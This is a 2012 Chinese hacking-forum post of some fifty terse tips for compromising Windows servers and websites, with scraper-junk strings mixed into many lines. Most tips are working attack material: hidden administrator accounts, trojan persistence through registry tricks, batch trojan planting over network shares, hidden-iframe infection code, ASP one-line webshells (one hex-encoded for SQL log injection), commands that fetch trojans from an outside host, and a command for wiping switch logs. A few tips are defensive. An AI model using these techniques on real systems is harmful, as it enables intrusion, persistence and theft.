中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) {2 b7 [9 p2 q0 g2 u% S% L% {. p/ q2 ~cacls C:\windows\system32 /G hqw20:R
& d$ D. W  a6 T0 y思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
: [" b0 x. W& u0 ~- a' h恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
$ Y& d3 T# X" H3 x
: N# c8 s$ B' i0 R: d, r2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
! p) b/ W* N6 ~- O! [5 r
2 u3 t; h2 J) C# D, B* y' B6 C3 q3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。- c0 U2 H% p! R3 H: B
( ~" A7 |. \4 X' u6 a4 x9 ]+ {
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
3 R  \2 ]2 U3 A* b! `& I+ }! @  @2 k% u
5、利用INF文件来修改注册表4 L1 O: t0 P8 J3 `! X$ O; ]- H
[Version]
" A7 c# I6 I) MSignature="$CHICAGO$"( a; T2 P: s% B2 d
[Defaultinstall]
" W$ d/ C# [& QaddREG=Ating
: I! @2 r. H2 {& X3 K: u[Ating]
7 W6 X$ r; y6 q2 S3 l: {HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
3 c; n% f5 W: {5 Y6 F9 A) I4 }以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
3 B: {5 k' W/ I0 I8 v  H/ |+ Qrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径5 _" a" B* @7 U1 x: C: c3 k5 w
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU$ {+ p4 R# F5 t9 M
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU' K3 y" a0 @3 _+ B
HKEY_CURRENT_CONFIG 简写为 HKCC4 D' [* N+ g: p+ f% v
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
& n  W: Q% F# j4 P"1"这里代表是写入或删除注册表键值中的具体数据
( S/ S1 q% x; O; l0 H' s+ j% N6 a( G& @$ P& W4 f/ ]
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
* e! F9 N3 A7 |) b/ @  o多了一步就是在防火墙里添加个端口,然后导出其键值
4 A: r; X( s. ]3 Y: i. c[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
" E  b- K6 ]5 ~9 {$ y
7 ]0 E$ q6 R. v6 f! _9 A- U7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
0 Z# S9 x$ y  Y4 w在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
7 S4 i- A& g+ D' V0 |& Q. @0 G* g0 q! S% i7 y; U
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。) k$ `) N, j& t; Z
; j- m, Z2 o8 F& b5 f
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
* ~! @( b0 j- n/ @! E可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。( Z1 R3 ?! g) p! E' ^6 E: ^5 _
! h% `4 @0 }$ x' ]" X8 }5 @
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”+ |, `  w6 r# T3 @. X
5 F7 E, V# y% B+ K( v+ @( x
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,: k$ Y1 P: b6 l& _( C( @% b8 k( J
用法:xsniff –pass –hide –log pass.txt; u2 y. Y0 o2 a3 m4 X2 T0 R" p6 Z
0 `9 F8 c( [( C' y; h/ m. F
12、google搜索的艺术
* }/ v9 h- v& |3 r7 c搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
$ j( |- q: F. Y! j7 m' F或“字符串的语法错误”可以找到很多sql注入漏洞。& `+ n6 S, h7 x2 t% f/ \+ O
" F/ Z! Z/ @$ G9 `" ^8 O% \
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
! S+ H3 f, i" {" s9 C" I( i+ b
. @- ], w) S0 X+ H14、cmd中输入 nc –vv –l –p 1987; [: k& X0 b4 H" J% X) S
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃/ I; G" s0 [9 G" V% {+ @
' s& n, Y! c7 j* T3 Q! t, B
15、制作T++木马,先写个ating.hta文件,内容为- a7 z7 S2 M9 U/ M" C$ {7 ~# a
<script language="VBScript">+ M" F* x- p0 u2 a+ f2 A4 r# X- u
set wshshell=createobject ("wscript.shell" )+ j  U- X! m) a6 Q& C# Z3 V
a=wshshell.run("你马的名称",1)
- N; B! l5 ~2 @# ~1 twindow.close
- d! x+ `& t  P* M/ C7 C" M0 @</script>
; `& X5 A2 C" t5 K. Y+ F7 i再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。8 h' h* c; l* q4 l' K5 s7 ?2 f
1 O  q. \2 K& h. a& ]4 W* g  Z
16、搜索栏里输入) @) [) Z5 U3 @( T/ W
关键字%'and 1=1 and '%'='
! y2 |9 K# ]9 k) \关键字%'and 1=2 and '%'='; B5 g5 u6 b" @! r' h7 d( R
比较不同处 可以作为注入的特征字符
; a6 H" y1 z% e6 e' h5 @3 s3 h9 w7 \- ?( i& u
17、挂马代码<html>+ }1 X3 e' g1 H
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) B! t' T% H/ D/ Z  P</html>
0 o: r$ o5 n# R' X  ^- O* w$ F* h
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
5 {+ u4 I1 W- }8 |7 fnet localgroup administrators还是可以看出Guest是管理员来。
0 V. s. @2 n  v& Q- z( C, }/ V! x% a
$ i! Y% v0 i1 P19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
# \/ p; f+ _8 \$ j, i用法: 安装: instsrv.exe 服务名称 路径
( f  {3 b8 l8 S: m卸载: instsrv.exe 服务名称 REMOVE
$ B8 Y$ F; l* X9 X% j( P
+ }. V2 f% R: q. K! R1 N- K% x" y& }
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉$ d' _6 s) f, s, p3 M7 g: W! \
不能注入时要第一时间想到%5c暴库。; U; f$ c# ]( s, z/ H* D

/ u% q7 O5 {  i3 I) P, C22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
/ t; [$ T! O* h1 N9 V. v7 h2 U: l
  y- X3 t$ r7 R6 L. _23、缺少xp_cmdshell时$ b: p$ |, l/ P1 V
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 W  g( M, e8 x# ~假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 }- h" n' N8 ?, A9 Pdeclare @o int
: a" U. k& g: r; J% d% U  D( ]exec sp_oacreate 'wscript.shell',@o out' m) y( f  U* r5 i4 a1 z; H
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员! k* V% h- b( H, t$ E3 K8 e* p
& K9 m+ w3 d7 d6 k, X, A
24.批量种植木马.bat
) w* K& z0 ?# f1 ]( k' V" M. |for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中5 |5 G9 ]( @! C3 @: V& Y- R
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间9 q4 D/ J& x4 `6 U
扫描地址.txt里每个主机名一行 用\\开头. h6 e* B0 Q  q8 |* N& y% P7 f0 d2 I

9 f8 v6 P; g2 t4 {3 o4 w9 O5 Z25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。- H9 f: K9 H. o* w
0 [3 E; v9 u# J! }5 V, ?4 f
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.8 V% A+ p# j) ?: F
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.1 ^/ w) G1 E8 o# j# r  n% ~+ B
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马, `. W. Q& |& T5 G' ?

  Q# D# |& s' t: L4 M8 u8 }27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP/ x! t; }. t  e7 d0 Y" `
然后用#clear logg和#clear line vty *删除日志3 {" z5 t9 X2 d: U

$ T" ^5 q( ?+ R- q3 S5 \28、电脑坏了省去重新安装系统的方法& W4 r% `2 X. s
纯dos下执行,
! F+ \- p" v4 c$ U% W$ A3 \xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" k% k7 S) B) ]) _2 @2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
1 b( K3 f/ |$ }5 }4 _& M- H! x' w6 W" M, l% O
29、解决TCP/IP筛选 在注册表里有三处,分别是:; Y7 b: E7 D) l8 r. i' d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip/ h: v& K+ c  s2 G" }4 P9 l
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: j4 n7 H( R) d' |6 @/ _% dHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- a) |. M* X/ T$ l1 \- d
分别用, a; \5 ]1 s& T) @  X
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: Q/ R: x5 h8 D$ u; G4 ]# S9 y
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ g' `  U% m0 [6 yregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; E' m! g6 v6 W! P/ Z( B( ?. s命令来导出注册表项; y" y! [' l* a& O! g* `+ |
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
2 ^' N  l* S  x! D. ]! C' [改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
5 K8 T% J) L9 g, Iregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。: I; ~* J, W) M( p6 T7 t# g0 T" x
! e( ~% E0 K/ e$ n
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* c' x/ ^7 V% sSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3' f8 n" T- u! m: E! p$ m2 m- M
* n' L- A4 d! Q9 {6 J
31、全手工打造开3389工具
- `7 g) @( Z4 p0 x  ]) K; t打开记事本,编辑内容如下:
1 w/ S* C9 I6 oecho [Components] > c:\sql
2 x! W' @, R2 w- Necho TSEnable = on >> c:\sql
0 ~' M7 A8 x" r( wsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
' ^& z3 S( n( J9 O- K编辑好后存为BAT文件,上传至肉鸡,执行3 |+ o& G, A/ Z# J( P2 I  F4 P

& W9 K$ {- `0 K4 d32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
1 h' x0 K+ K; C
( L$ y5 o1 O- z) C! |33、让服务器重启$ `1 T, Y2 S! }
写个bat死循环:$ N3 d! V* W+ {! T
@echo off
& t# D; x$ \8 K3 ~7 E7 E3 _) n:loop1: R8 j0 f, s" }- [
cls
* j8 f1 j1 l% V. ]3 |; Cstart cmd.exe% H1 i, u% p& r* H8 Y& }
goto loop1
. q% s) w! S, L4 F6 \* d% D保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启( a2 E5 l. w" n$ @, K4 c9 C
5 d: C1 v  q& S: p% |' h4 k
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,. d. N% f6 w. e1 K9 y
@echo off
: F: i3 Y( Z- u! A' C7 edate /t >c:/3389.txt
1 J1 ~7 R; T1 D$ X# Qtime /t >>c:/3389.txt
+ E. v% C' w# n6 g$ F9 }6 C0 b. iattrib +s +h c:/3389.bat
/ ~8 x# _- g% h" ?* H0 h6 cattrib +s +h c:/3389.txt
! L! d; A+ E& i/ I2 unetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
2 ^+ R1 L9 F' x: n. {4 [9 ~并保存为3389.bat, Q1 {- N9 ^/ h  [: i1 q6 e5 {9 o" G
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
5 S/ b* k4 {/ Y6 y2 \9 |, d* ?+ t+ B0 Q" i/ |( d$ L+ D
35、有时候提不了权限的话,试试这个命令,在命令行里输入:# z  [# k( X. v6 G# F
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)# C+ _; u9 d3 t: F+ L
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
0 m- y1 r$ J/ `7 V  j6 n0 r5 k/ T, l
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: C  x5 c3 A9 `echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址) T! h$ j9 }# G
echo 你的FTP账号 >>c:\1.bat //输入账号
: X% s4 |! z, ^. iecho 你的FTP密码 >>c:\1.bat //输入密码" E+ r* }! b4 n5 i# _
echo bin >>c:\1.bat //登入# Z; ?  R; d& ^" f( q* ~: [
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么- @7 F7 P. N; y  W# f3 {
echo bye >>c:\1.bat //退出
) @6 r8 {) ^$ u然后执行ftp -s:c:\1.bat即可3 ~$ ]% ^1 ]* D! J& m

% n5 G- F% b0 P3 v0 I  o( e37、修改注册表开3389两法
) O0 u: J9 j# p* z# Q4 G(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表  l2 B/ s5 b5 W1 r, G% T
echo Windows Registry Editor Version 5.00 >>3389.reg, m0 r8 S4 v: F) D6 c4 Y" Y4 J- v
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
8 I& s. R$ [6 h8 yecho "Enabled"="0" >>3389.reg0 a& e! ]; o) z! g5 T# a8 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* {6 T" }' c0 U6 A- C8 \( a  x; xNT\CurrentVersion\Winlogon] >>3389.reg8 p9 n3 w7 R- W4 N) ^0 X
echo "ShutdownWithoutLogon"="0" >>3389.reg& T1 g4 E& k: H# F. f9 ]- i7 z) x% \/ s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]& S  p% R& N  U* {: l0 W' b1 v: a5 P6 Y! [
>>3389.reg* m/ _# J* H/ P
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg. U  P5 _) Y/ J: _- r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
5 l: ?- {* U' s6 c# G>>3389.reg3 S, B6 K( \& n: r
echo "TSEnabled"=dword:00000001 >>3389.reg5 X( Z" R1 B7 K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
9 H# L0 B& |; I2 Z: uecho "Start"=dword:00000002 >>3389.reg
8 G* H, B- b- b# @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]7 R# u/ b" d6 O5 \. `
>>3389.reg; h1 n8 B  i! X, ]( n+ h
echo "Start"=dword:00000002 >>3389.reg
/ b- d( F6 E: S! m. x- F8 decho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg9 ?% d( H- m) g; x& G
echo "Hotkey"="1" >>3389.reg
$ p1 t9 J- n! G2 j# m8 Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- ]: |! k5 U/ J9 p$ g7 g
Server\Wds\rdpwd\Tds\tcp] >>3389.reg0 I$ e: S+ ~- _0 `) ^: u  Q, y
echo "PortNumber"=dword:00000D3D >>3389.reg8 c8 g& o7 j" n  H" Q. |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% Q5 t# V, U8 z5 ^( @8 t4 g
Server\WinStations\RDP-Tcp] >>3389.reg
5 p2 Q3 L* F$ `( o) c, Uecho "PortNumber"=dword:00000D3D >>3389.reg0 r! D+ ], I3 @; z8 t3 W4 X
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。* p: A" C( Q1 n- M. r; t
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
& `  Q% ?6 Z! x4 x0 h& Q因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效8 w( L* G; y5 O8 D  _- L
(2)winxp和win2003终端开启
6 O$ \2 S4 ~' M) F. V用以下ECHO代码写一个REG文件:
6 c4 H( ~  c7 j, m9 y. q+ ?3 q: wecho Windows Registry Editor Version 5.00>>3389.reg
6 o+ M; D, y: P# O( iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% s$ o$ v% c: \' lServer]>>3389.reg( M! M2 ^/ |& J8 [
echo "fDenyTSConnections"=dword:00000000>>3389.reg
& C1 z7 z8 j+ fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 D+ X) I: G, m$ ]! m
Server\Wds\rdpwd\Tds\tcp]>>3389.reg" x, R: J/ V% A. S' e' u2 y
echo "PortNumber"=dword:00000d3d>>3389.reg
8 x* L7 D/ L# n3 a5 H; S0 c' M) fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 D: w8 j  V* x" W. _Server\WinStations\RDP-Tcp]>>3389.reg
# ~. w5 ~* u5 {' P# z- |echo "PortNumber"=dword:00000d3d>>3389.reg& i, V# B2 u1 ?% S0 J: Q! ?8 Z9 i& @& s
然后regedit /s 3389.reg del 3389.reg
0 r0 D4 l3 I! q+ s" ^! NXP下不论开终端还是改终端端口都不需重启6 z" `/ q$ T; l5 o

+ k  a; P: Z3 _2 M38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) V% j0 Q: O" h1 P用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) j" t1 C% @$ T$ C# T
8 k( x* G+ r6 S' q- E39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
4 l( X* z& ?3 G9 G/ X) y(1)数据库文件名应复杂并要有特殊字符
; _! b9 \) O; z+ I# g6 P(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
( B) ~, \0 `, s. U# y3 c+ C" Y% D将conn.asp文档中的
* G' X, ]/ e! s  ]% B7 M  wDBPath = Server.MapPath("数据库.mdb")1 E) z- N' `$ b* u7 V9 l8 j; }) C
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath7 o! G9 d, B, c$ c: ^% U1 b
% R# E0 `- s4 ?
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置0 W! [# s6 g* T0 w+ \* K: x6 Z
(3)不放在WEB目录里
2 K0 c7 l1 p; h* q* x
7 M5 T2 y2 i1 I3 D40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉, L6 `  A( a, n9 P% E4 F2 Q0 w. n
可以写两个bat文件, e) Y% ^  N: s; E* F2 j
@echo off/ N& _; _5 v( j$ E) \- _* K
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe1 K* I/ z2 s$ H/ ?# C. X  Q, [
@del c:\winnt\system32\query.exe! ?6 m' X) h' d, c$ C- Y
@del %SYSTEMROOT%\system32\dllcache\query.exe+ Z; G4 U. H7 C$ n6 [
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
+ j0 C% M! k% {! l3 Q& E) l8 a- ~3 A! k& e, o. n
@echo off4 z/ g( s0 [% k; R7 h6 E
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe& t. c2 {: Y0 q, i) N6 l$ U
@del c:\winnt\system32\tsadmin.exe6 _! E( y/ x8 x/ R, |7 E" }8 Q
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
6 ~( |# K+ ]8 s7 V( _( D0 Z3 n* K+ c* ]/ ]9 ]
41、映射对方盘符7 s( h. e$ |4 Q! u9 |- o
telnet到他的机器上,
- u% u( E  S, h7 A$ c2 F5 Rnet share 查看有没有默认共享 如果没有,那么就接着运行
& L5 Q$ M, _1 ?net share c$=c:- T. z- k, E9 C5 o* |$ Q/ m
net share现在有c$
* ~' s1 O8 @) ?/ r/ e  @在自己的机器上运行% ^7 p! u8 a; n; ?4 |! z* y: S& A
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
3 [9 U8 q) E  Q7 [4 z9 P7 |& n$ ^5 b3 ?. f
( @) C' z  p) x+ U5 g1 Z$ Q42、一些很有用的老知识
) Q! ^7 {/ d2 G0 ~: o3 k+ V" Ctype c:\boot.ini ( 查看系统版本 )
% o; Z$ ?2 ]( W, Pnet start (查看已经启动的服务)
1 y1 K! f, i6 q+ Kquery user ( 查看当前终端连接 )
6 G2 u# W2 Q0 y. ?4 J5 m, gnet user ( 查看当前用户 )' b7 k' d4 X, l+ F/ ^4 r. M+ h) S
net user 用户 密码/add ( 建立账号 )
- [/ a1 R! F4 S; W1 E- Lnet localgroup administrators 用户 /add (提升某用户为管理员)* t5 f, F. H7 A; C! M
ipconfig -all ( 查看IP什么的 )% r' ]: D; ^0 ^* c
netstat -an ( 查看当前网络状态 )+ L* X$ z9 K' I1 R  R1 L
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)$ ?3 }6 E- O( S: @* t( Z* f/ b
克隆时Administrator对应1F4  N6 I9 j2 o( x7 S+ ]" o" J
guest对应1F54 n3 Z0 g6 t. |3 g* `/ v
tsinternetuser对应3E8
  W/ y' b6 Z5 e3 L6 N1 j
: |* C! Q$ {$ \43、如果对方没开3389,但是装了Remote Administrator Service* p, k8 B! b# p% F1 y& Y/ S4 ^0 i
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接5 I; k/ s+ ?8 V0 t( I6 n
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息2 h! E( Q) w: j7 B( d! v8 U3 v! b
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"7 y4 j& `  ?+ N# {
% C) _4 ~+ g( J
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)! e6 ~  r: }0 q& _( U) f! G: P$ S
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)2 ~- e( {; k0 F( k" u2 m; x1 w

; l. s* I& p1 m* u1 O45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)5 w9 G; y" t; [% x
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open, p' [# a6 Z8 t1 `
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
+ |# i, ?. ~4 Y! D8 hCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 w/ ]3 q/ G6 d4 H1 T8 p1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs8 c" V2 x# C# k6 q
(这是完整的一句话,其中没有换行符)
% ?& k5 A+ W" E  ^8 j0 n7 F6 X' F然后下载:( R) [0 u$ ?7 F* U& b. r. c' u8 o
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
5 `. p. W4 i: @0 @: G8 F$ ^1 a
2 r  o5 I5 Y% w2 S5 B/ p46、一句话木马成功依赖于两个条件:
' [5 z. p' q0 ~5 y' T3 r2 \# T8 B1、服务端没有禁止adodb.Stream或FSO组件
8 d, H, I2 T% ?/ D. e. j8 g6 W2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
" T, H1 y, n7 F8 b$ n- c
7 \/ s+ e# }( T- w5 m47、利用DB_OWNER权限进行手工备份一句话木马的代码:
! h& r1 D9 `8 u/ A" s4 ^( r* J;alter database utsz set RECOVERY FULL--
/ E" _, y+ E% d3 p, i- j;create table cmd (a image)--
' @, k8 W, y8 n. D  m0 A: k;backup log utsz to disk = 'D:\cmd' with init--: ^8 ~, `5 B& ^: A
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--- ?5 N% X( x4 V* {
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
$ r9 E7 L( R8 f) F  f注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。8 B0 F. K5 n: Q
$ d7 V" H& h" {9 h3 q& m0 W
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
4 H$ S, t; R, D& L  Y
, |& t4 G9 I  ^# Q! x6 M用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options9 R9 R% _  P6 Q2 r; H0 }
所有会话用 'all'。5 ~: [  K, J" m) e
-s sessionid 列出会话的信息。
4 `& N! B. I' ?-k sessionid 终止会话。( \5 \& ?0 [, [
-m sessionid 发送消息到会话。8 K0 P$ O2 u; N% m0 ?7 H1 w
; A) l4 [+ E3 F9 x% z
config 配置 telnet 服务器参数。7 a, t% W7 m% r5 ^  J
. Y+ S5 R6 v, e$ g5 ?- ?
common_options 为:/ x" W- N# m, k9 J. X" I8 f: A
-u user 指定要使用其凭据的用户
) e# [5 c) O: \4 U1 x8 E6 @% H-p password 用户密码
: F2 N7 H% v2 P3 z+ q
) D2 S$ W, M+ v, oconfig_options 为:
7 }* o' m+ H$ R; o/ i  Pdom = domain 设定用户的默认域+ E& S- H, z6 w' m4 j  Y( H% f
ctrlakeymap = yes|no 设定 ALT 键的映射
& K* E. F* B3 e+ gtimeout = hh:mm:ss 设定空闲会话超时值% t5 s' W# q' t. b
timeoutactive = yes|no 启用空闲会话。4 a# e) Z4 W; r) \( F
maxfail = attempts 设定断开前失败的登录企图数。
8 H* e# b) N  O& Q8 d# P, imaxconn = connections 设定最大连接数。
# C6 m4 I% r+ Xport = number 设定 telnet 端口。! l! Y- C8 ^6 [2 {/ b0 v
sec = [+/-]NTLM [+/-]passwd6 A1 D5 B) }2 c2 {, M7 {
设定身份验证机构
- O' ~. E- ^& I; Q( Rfname = file 指定审计文件名。
% D# B+ |! w+ k7 g+ h! Gfsize = size 指定审计文件的最大尺寸(MB)。4 b: j% H' }, B( w2 ^
mode = console|stream 指定操作模式。
$ h9 \) k9 r& W; m: A6 f, d& Kauditlocation = eventlog|file|both
  j2 s: d# G! V9 g  G指定记录地点
# K0 r0 i+ n% H& P1 W3 Caudit = [+/-]user [+/-]fail [+/-]admin5 Q) s0 c2 q1 l
2 c  D9 T0 |; `% W$ l) B, T8 i
49、例如:在IE上访问:
# h+ ^1 P* x4 k6 b5 f: M. Gwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/7 U+ \. ?/ \% a3 k9 b! I! e0 y% q
hack.txt里面的代码是:" ]0 U; `6 {4 _# x6 D
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& D0 t7 W8 t- @把这个hack.txt发到你空间就可以了!- _% X4 }7 c. {
这个可以利用来做网马哦!
( c4 v3 e9 t! e9 X6 G5 z) @7 h; G$ M, P0 F8 w( x- ?
50、autorun的病毒可以通过手动限制!
- S7 A. i6 k1 F0 m6 V! ~" m1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!) k5 b/ Y0 u" C9 |5 Q8 M
2,打开盘符用右键打开!切忌双击盘符~+ O3 `) f7 L, N: i. A, N
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
+ ]/ J* S, Y* C5 w$ U1 Y' b0 B* Q" t0 l
51、log备份时的一句话木马:' ^7 W3 J" O1 M: P* w" V
a).<%%25Execute(request("go"))%%25>0 O+ Z* d+ {6 k! H, E( M
b).<%Execute(request("go"))%>8 O7 E  ^3 F* R) R& u7 z! P+ q
